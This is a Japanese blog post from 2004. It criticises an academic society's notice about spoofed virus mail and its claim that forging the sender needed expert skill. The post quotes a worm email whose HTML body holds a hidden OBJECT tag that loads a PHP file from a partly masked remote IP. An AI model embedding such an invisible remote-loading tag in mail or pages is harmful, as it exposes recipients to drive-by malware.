3月19日に、電子情報通信学会から事務局長の署名付きで次のメールが来た。会員全員に向けて送られたメールのようだ。
From: " 電子情報通信学会サービス部 " <service@ieice.org>
To: zenieice@ieice.or.jp
Date: Fri, 19 Mar 2004 14:15:36 +0900
Subject: 緊急連絡 [ ウイルス汚染メールのお知らせ]
関係会員各位
緊急連絡 [ウイルス汚染メールのお知らせ]
会員からの情報で昨日から電子情報通信学会の事務局を名乗り<csjimu>から発信
された通信ソサイエティ会員へのメールが発信されていることが判明しました。これ
はなりすましメールでウイルスに汚染されていますのでメールを開かず廃棄していた
だきますようご連絡致します。
<現状>
発信形態は以下のようになっており、正規のメール形態となっています。
To:csjimu@ieice.ieice.org
From:csjimu-request@ieice.org On Behalf Of cstuti@ieice.org
<調査>
調査しましたところ、昨日は学会からは発信の実態はありませんでした。今回のな
りすましのケースは<strong>かなり技術に詳しい者でないとできないレベルであるこ
とが判りました</strong>。
(以下略)
「かなり技術に詳しい者でないとできないレベル」とは何のことだろうか。
その数時間後、「Re: Hello」というメールが同じアドレスに到着した。
X-Saved-Received: [0] from kt.net ([147.6.20.61]) by ieice.ieice.org (8.12.11/8.12.11) with SMTP id i2J86aVx010696 for <zenieice@ieice.or.jp> Fri, 19 Mar 2004 17:06:36 +0900 (JST) From: ieicezen@ieice.org To: zenieice@ieice.or.jp Date: Fri, 19 Mar 2004 17:05:48 +0900 Subject: Re: Hello <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://211.119.XX.XX:81/452295.php"> <OBJECT></body></html>
よくある、From:詐称型のメールワームのようだ。「Bagle」の亜種O, P, Q, R, Sのどれかあたりだろうか。感染した誰かのコンピュータ内のファイル(Internet Explorerのキャッシュ等)中にメールアドレス「ieicezen@ieice.org」と「zenieice@ieice.or.jp」が含まれていたなら、こうしたメールが送信されることは普通に起こり得る。
学会からのメールの続きには次のように書かれていた。
From: " 電子情報通信学会サービス部 " <service@ieice.org> To: zenieice@ieice.or.jp Date: Fri, 19 Mar 2004 14:15:36 +0900 Subject: 緊急連絡 [ ウイルス汚染メールのお知らせ] (略) なお、本メールは停止状態のcsjimuでは配信できないことと、犯人が他の同報通信 をトライしている可能性が否定できないため、全会員あてで配信させていただきます ことをご了承願います。対策が終了しましたら、その旨を付記してもう一度全会員に ご連絡しました上で配信を再開させていただきます。
「かなり技術に詳しい者でないとできないレベル」という発言はなぜ出てくるのか。通常の技術レベルでは未然に防ぐことのできないもの(不可抗力)だったと言いたいということだろうか。
そもそも、「かなり技術に詳しい」かどうかというのは、誰がどのような基準で判断するのか。自分の理解を超えているからという理由では、誰でも何とでも言えてしまうのが自明であるから、それでは主張すること自体に意味がない。
ありがちなのは、技術アレルギーの人がそういう考えに陥ってしまうことだ。
技術に縁のない人達にとって、「電子レンジを作れ」と言われても、どうやったらよいのか途方に暮れるだろう。しかし、電子レンジは神が創り出したものではない。どこかの技術者が作っているものだということは誰もが知っている。電子レンジを製造することについて「かなり技術に詳しくないとできないレベル」だとか、ラジオを製造することについて「かなり技術に詳しくないと(略)」などと主張する人はいない。それぞれの工業製品はそれぞれの専門分野の人が「当たり前の業務」として製造に携わっているであろうと、誰もがそう直感しているはずだ。
ソフトウェアも同じである。むしろソフトウェアの製造に必要な知識を持つ人は、他の工業製品の場合に比べて圧倒的に多いだろう。(平凡な)ウイルスを製造することなど、プログラマにとっては「当たり前の業務」と同様にできることである。技術に無縁な人達にはそれがわからないことが少なくないようだ。(どう説明したらよいだろうか。)
ましてや、From:を詐称することなんぞは、メーラの設定を変えるだけでできるのであり、プログラミングすら必要でない。
「かなり技術に詳しい者でないとできないレベル」と発言するのは、いかなる状況であれ、恥ずかしいことだということを知っておくとよい。
とはいえ、いかなる場合にも不可抗力だと主張できないのも酷な話である。そのためには、妥当な対策レベルを示す基準が必要なのだが、それが存在しないのが現状であろう。